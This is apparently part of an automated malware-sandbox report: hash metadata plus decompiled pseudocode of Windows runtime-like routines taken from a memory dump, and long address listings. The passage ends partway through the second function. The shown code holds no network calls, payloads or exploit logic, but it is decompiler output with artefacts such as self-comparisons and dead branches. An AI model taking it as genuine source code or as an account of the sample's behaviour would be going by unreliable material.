                                                                  • Opcode ID: c598b99436e84a638dc4162e59ab2631778f32d18196fea571d149241984c4ac
                                                                  • Instruction ID: e2106b9957997c19c0bea2f8090bd3681da20fec3cdf78eb5ea0f41e4a10855b
                                                                  • Opcode Fuzzy Hash: c598b99436e84a638dc4162e59ab2631778f32d18196fea571d149241984c4ac
                                                                  • Instruction Fuzzy Hash: 2AF161706082519BCB64CF59C480B3AB7E5FF88754F24493EF885CB2A0E734E995DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049620A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 92%
                                                                  			E049620A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4a28714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04962EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04962EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E049358EC(_t240);
									_t221 =  *0x4a25cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4a25cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04974A2C(0x4a26e40, 0x4974b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04957D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4915c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0496F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0496F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E049B7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04952400(_t267 + 0x20);
															}
															L04952400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04962397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04952280(_t134, 0x4a28608);
									__eflags =  *0x4a26e48 - _t253; // 0x29b190
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0494FFB0(_t198, _t241, 0x4a28608);
										__eflags = _t253;
										if(_t253 != 0) {
											L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4a26e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4a28608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04966B90(_t210,  &_v64);
										_t262 =  *0x4a28608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0496E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E049797C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0497006A(0x4a28608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4a28608);
												E0497B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4a26904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4a26e48; // 0x29b190
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E0494FFB0(_t198, _t240, 0x4a28608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E049700C2(0x4a28608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x0
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                  0x049620a0
                                                                  0x049620a8
                                                                  0x049620ad
                                                                  0x049620b3
                                                                  0x049620b8
                                                                  0x049620c2
                                                                  0x049620c7
                                                                  0x049620cb
                                                                  0x049620d2
                                                                  0x04962263
                                                                  0x04962266
                                                                  0x049a5836
                                                                  0x049a5836
                                                                  0x00000000
                                                                  0x0496226c
                                                                  0x0496226c
                                                                  0x04962270
                                                                  0x04962274
                                                                  0x049620e2
                                                                  0x049620e2
                                                                  0x049620e6
                                                                  0x049620ee
                                                                  0x049a57dc
                                                                  0x049a57de
                                                                  0x049a57ec
                                                                  0x049a57ec
                                                                  0x049a57f1
                                                                  0x049a57f3
                                                                  0x049a57f8
                                                                  0x00000000
                                                                  0x049a57f8
                                                                  0x049a57e0
                                                                  0x049a57e4
                                                                  0x049a57ea
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a57ea
                                                                  0x049620f4
                                                                  0x049620f4
                                                                  0x049620f8
                                                                  0x049620f8
                                                                  0x049620fc
                                                                  0x04962100
                                                                  0x04962106
                                                                  0x04962201
                                                                  0x04962206
                                                                  0x0496220b
                                                                  0x0496220e
                                                                  0x049622a9
                                                                  0x049622ac
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049622b2
                                                                  0x049622b5
                                                                  0x049a5801
                                                                  0x049a5806
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5810
                                                                  0x049a5815
                                                                  0x049a5818
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a581e
                                                                  0x049622bb
                                                                  0x049622bb
                                                                  0x04962218
                                                                  0x04962218
                                                                  0x0496221c
                                                                  0x04962220
                                                                  0x04962222
                                                                  0x049622c2
                                                                  0x049622c4
                                                                  0x049622dc
                                                                  0x049622dc
                                                                  0x049622e1
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049622e7
                                                                  0x049622c8
                                                                  0x049622cd
                                                                  0x049622d3
                                                                  0x049622d6
                                                                  0x049a5823
                                                                  0x049a5825
                                                                  0x049a5827
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a582d
                                                                  0x00000000
                                                                  0x049a582d
                                                                  0x00000000
                                                                  0x04962228
                                                                  0x04962228
                                                                  0x00000000
                                                                  0x04962228
                                                                  0x04962222
                                                                  0x04962214
                                                                  0x04962214
                                                                  0x00000000
                                                                  0x04962114
                                                                  0x04962114
                                                                  0x04962114
                                                                  0x0496211a
                                                                  0x0496211c
                                                                  0x04962348
                                                                  0x0496234d
                                                                  0x049a5840
                                                                  0x049a5845
                                                                  0x049a5848
                                                                  0x049a584e
                                                                  0x049a584e
                                                                  0x049a5848
                                                                  0x04962353
                                                                  0x04962355
                                                                  0x04962388
                                                                  0x04962388
                                                                  0x04962368
                                                                  0x0496236a
                                                                  0x0496236c
                                                                  0x0496238f
                                                                  0x00000000
                                                                  0x0496236e
                                                                  0x0496236e
                                                                  0x0496218e
                                                                  0x0496218e
                                                                  0x04962191
                                                                  0x04962195
                                                                  0x049a5a03
                                                                  0x049a5a06
                                                                  0x049a5a0c
                                                                  0x049a5a0f
                                                                  0x049a5a11
                                                                  0x049a5a13
                                                                  0x049a5a13
                                                                  0x049a5a19
                                                                  0x049a5a1f
                                                                  0x00000000
                                                                  0x0496219b
                                                                  0x0496219b
                                                                  0x049621a0
                                                                  0x04962282
                                                                  0x04962284
                                                                  0x04962284
                                                                  0x04962284
                                                                  0x04962284
                                                                  0x049621a6
                                                                  0x049621a9
                                                                  0x049621ac
                                                                  0x049621ae
                                                                  0x049621b3
                                                                  0x0496228b
                                                                  0x04962290
                                                                  0x04962379
                                                                  0x04962296
                                                                  0x04962298
                                                                  0x04962298
                                                                  0x04962290
                                                                  0x049621b9
                                                                  0x049621be
                                                                  0x049622a2
                                                                  0x049622a2
                                                                  0x049621c4
                                                                  0x049621c8
                                                                  0x049621cc
                                                                  0x049621d0
                                                                  0x049621d4
                                                                  0x049621de
                                                                  0x049621e3
                                                                  0x049a5a29
                                                                  0x049a5a2c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5a3b
                                                                  0x00000000
                                                                  0x049621e9
                                                                  0x049621e9
                                                                  0x049621e9
                                                                  0x049621ee
                                                                  0x049621f1
                                                                  0x049a5a45
                                                                  0x049a5a4b
                                                                  0x049a5a52
                                                                  0x049a5a58
                                                                  0x049a5a5d
                                                                  0x049a5a5f
                                                                  0x049a5a71
                                                                  0x049a5a61
                                                                  0x049a5a6a
                                                                  0x049a5a6a
                                                                  0x049a5a76
                                                                  0x049a5a79
                                                                  0x049a5a7f
                                                                  0x049a5a83
                                                                  0x049a5a85
                                                                  0x049a5a87
                                                                  0x049a5a87
                                                                  0x049a5a8c
                                                                  0x049a5a91
                                                                  0x049a5a97
                                                                  0x049a5a9f
                                                                  0x049a5aa0
                                                                  0x049a5aa1
                                                                  0x049a5aa6
                                                                  0x049a5aab
                                                                  0x049a5ab1
                                                                  0x049a5ab3
                                                                  0x049a5ab9
                                                                  0x049a5aca
                                                                  0x049a5ad4
                                                                  0x049a5ad4
                                                                  0x049a5ade
                                                                  0x049a5ade
                                                                  0x049a5aab
                                                                  0x049a5a79
                                                                  0x049a5a52
                                                                  0x049621f7
                                                                  0x049621f9
                                                                  0x049621fe
                                                                  0x049621fe
                                                                  0x049621e3
                                                                  0x04962195
                                                                  0x0496236c
                                                                  0x04962122
                                                                  0x04962122
                                                                  0x04962124
                                                                  0x04962231
                                                                  0x04962236
                                                                  0x04962236
                                                                  0x04962238
                                                                  0x04962238
                                                                  0x04962240
                                                                  0x04962242
                                                                  0x04962244
                                                                  0x049a59fc
                                                                  0x0496218c
                                                                  0x0496218c
                                                                  0x00000000
                                                                  0x0496218c
                                                                  0x0496224a
                                                                  0x0496224f
                                                                  0x04962256
                                                                  0x04962304
                                                                  0x04962309
                                                                  0x0496230f
                                                                  0x0496231e
                                                                  0x0496231e
                                                                  0x0496231e
                                                                  0x04962320
                                                                  0x04962325
                                                                  0x0496232a
                                                                  0x0496232c
                                                                  0x0496233e
                                                                  0x0496233e
                                                                  0x00000000
                                                                  0x0496232c
                                                                  0x04962311
                                                                  0x04962317
                                                                  0x0496231a
                                                                  0x0496231c
                                                                  0x04962380
                                                                  0x04962380
                                                                  0x04962380
                                                                  0x04962384
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04962386
                                                                  0x00000000
                                                                  0x0496231c
                                                                  0x0496225c
                                                                  0x0496225c
                                                                  0x00000000
                                                                  0x0496225c
                                                                  0x0496212a
                                                                  0x04962134
                                                                  0x04962138
                                                                  0x0496213d
                                                                  0x049a5858
                                                                  0x049a5863
                                                                  0x049a5863
                                                                  0x049a5867
                                                                  0x049a586a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a586c
                                                                  0x049a586c
                                                                  0x049a5871
                                                                  0x049a5875
                                                                  0x049a5877
                                                                  0x049a5997
                                                                  0x049a599c
                                                                  0x049a59a1
                                                                  0x049a59a7
                                                                  0x049a59a7
                                                                  0x00000000
                                                                  0x049a59a7
                                                                  0x049a587d
                                                                  0x00000000
                                                                  0x049a588b
                                                                  0x049a588b
                                                                  0x049a5890
                                                                  0x049a5892
                                                                  0x049a5894
                                                                  0x049a5899
                                                                  0x049a589b
                                                                  0x049a58a0
                                                                  0x049a58a0
                                                                  0x049a58aa
                                                                  0x049a58b2
                                                                  0x049a58b6
                                                                  0x049a58be
                                                                  0x049a58c6
                                                                  0x049a58c9
                                                                  0x049a590d
                                                                  0x049a5917
                                                                  0x049a591a
                                                                  0x049a591c
                                                                  0x049a5920
                                                                  0x049a5928
                                                                  0x049a592a
                                                                  0x049a592c
                                                                  0x049a592e
                                                                  0x049a592e
                                                                  0x049a58cb
                                                                  0x049a58cd
                                                                  0x049a58d8
                                                                  0x049a58e0
                                                                  0x049a58f4
                                                                  0x049a58fe
                                                                  0x049a58fe
                                                                  0x049a593a
                                                                  0x049a593e
                                                                  0x049a5940
                                                                  0x049a5942
                                                                  0x00000000
                                                                  0x049a5944
                                                                  0x049a5944
                                                                  0x049a5949
                                                                  0x049a594e
                                                                  0x049a594e
                                                                  0x049a5953
                                                                  0x049a595b
                                                                  0x049a5976
                                                                  0x049a5976
                                                                  0x049a597a
                                                                  0x049a597f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5981
                                                                  0x049a5981
                                                                  0x049a5981
                                                                  0x049a5983
                                                                  0x049a5988
                                                                  0x049a598d
                                                                  0x049a5991
                                                                  0x049a5991
                                                                  0x00000000
                                                                  0x049a595d
                                                                  0x049a595d
                                                                  0x049a5963
                                                                  0x049a5965
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5967
                                                                  0x049a5967
                                                                  0x049a596b
                                                                  0x049a596d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a596f
                                                                  0x049a5971
                                                                  0x049a5971
                                                                  0x049a5974
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a5974
                                                                  0x00000000
                                                                  0x049a5967
                                                                  0x049a595b
                                                                  0x049a5942
                                                                  0x049a5863
                                                                  0x04962143
                                                                  0x04962143
                                                                  0x04962149
                                                                  0x0496214f
                                                                  0x049622ec
                                                                  0x049622f1
                                                                  0x049622f6
                                                                  0x00000000
                                                                  0x049622f6
                                                                  0x04962159
                                                                  0x04962173
                                                                  0x04962173
                                                                  0x0496217d
                                                                  0x04962181
                                                                  0x04962186
                                                                  0x049a59ae
                                                                  0x049a59b2
                                                                  0x049a59b5
                                                                  0x049a59b7
                                                                  0x049a59ba
                                                                  0x049a59cd
                                                                  0x049a59d1
                                                                  0x049a59d5
                                                                  0x049a59d9
                                                                  0x049a59db
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a59dd
                                                                  0x049a59dd
                                                                  0x049a59e1
                                                                  0x049a59e4
                                                                  0x049a59e7
                                                                  0x049a59ee
                                                                  0x049a59ee
                                                                  0x049a59f3
                                                                  0x049a59f3
                                                                  0x00000000
                                                                  0x04962186
                                                                  0x04962164
                                                                  0x0496216d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496216d
                                                                  0x04962106
                                                                  0x04962266
                                                                  0x049620d8
                                                                  0x049620da
                                                                  0x049620e0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7a225173016dca9b04c638c5a405973057bf8faa3554ab179951995be337a4c1
                                                                  • Instruction ID: 1db40ae7b0f3ecc0f9f3043dff76cfe69de1c6e495e197df1c9621c8aed5de38
                                                                  • Opcode Fuzzy Hash: 7a225173016dca9b04c638c5a405973057bf8faa3554ab179951995be337a4c1
                                                                  • Instruction Fuzzy Hash: 3FF1D531708341AFD725DF28C540B6A77EAAFC5724F0589BDE8969B290E735F841CB82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0494849B, Relevance: .3, Instructions: 290COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E0494849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4a0f9c0);
				E0498D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4a27b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0494CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04952280( *[fs:0x30], 0x4a28550);
						_t139 =  *0x4a27b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0496F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0494FFB0(_t193, _t235, 0x4a28550);
								L5:
								return E0498D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04931C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4a27b9c; // 0x0
							_t235 = L04954620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4a27b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_t193 = E0496A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags, _t237 - 0x58, _t237 - 0x39, _t237 - 0x74);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0494FFB0(_t193, _t235, 0x4a28550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L049577F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L049577F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4a27b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4a27b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E049737C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4a27b9c; // 0x0
									_t214 = L04954620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E049737F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4a27b10 =  *0x4a27b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4a27b04 =  *0x4a27b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
